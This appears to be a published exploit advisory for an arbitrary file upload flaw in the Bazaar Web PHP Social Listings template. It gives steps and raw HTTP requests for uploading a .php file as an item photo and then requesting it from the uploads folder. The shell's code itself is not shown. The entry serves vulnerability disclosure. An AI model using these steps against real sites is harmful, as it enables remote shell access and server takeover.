Bazaar Web PHP Social Listings suffers from a remote shell upload vulnerability.
332c8c67d69bd164ce7cf1a517267229
<--
# Exploit Title: Bazaar Web PHP Social Listings Arbitrary File Upload
# Google Dork: N/A
# Date: 19/12/2021
# Exploit Author: Sohel Yousef - [email protected]
# Software Link: https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913
# Software Demo :https://xserver.app/__apps/bazaar-web/index.php#
# Category: webapps
1. Description
Bazaar Web PHP Social Listings script contain arbitrary file upload
registered user can upload .php files in Edit an item section without
any security
list item link :
localhost bazaar-web/list-item-info.php
edit item photos and upload php files and inspect element your php
direction
uploaded file direction
local host bazaar/uploads/yourfile.php
just right click the photo and use inspect element you will have your
direction
Host: (HOST)
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------47450779111254302601850437199
Content-Length: 63132
Connection: keep-alive
Referer: https:/localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5
Cookie: AWSALB=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; AWSALBCORS=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; PHPSESSID=o0it0cquadspsgh864fr4mvtrt
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
file=fx.php&fileName=fx.php
GET
https://localhost/bazaar/uploads/pZ2CGSkezbiDprchqpZ7_fx.php
Host: HOST
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: image/avif,image/webp,*/*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5
Cookie: AWSALB=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; AWSALBCORS=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; PHPSESSID=o0it0cquadspsgh864fr4mvtrt
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
#####
-->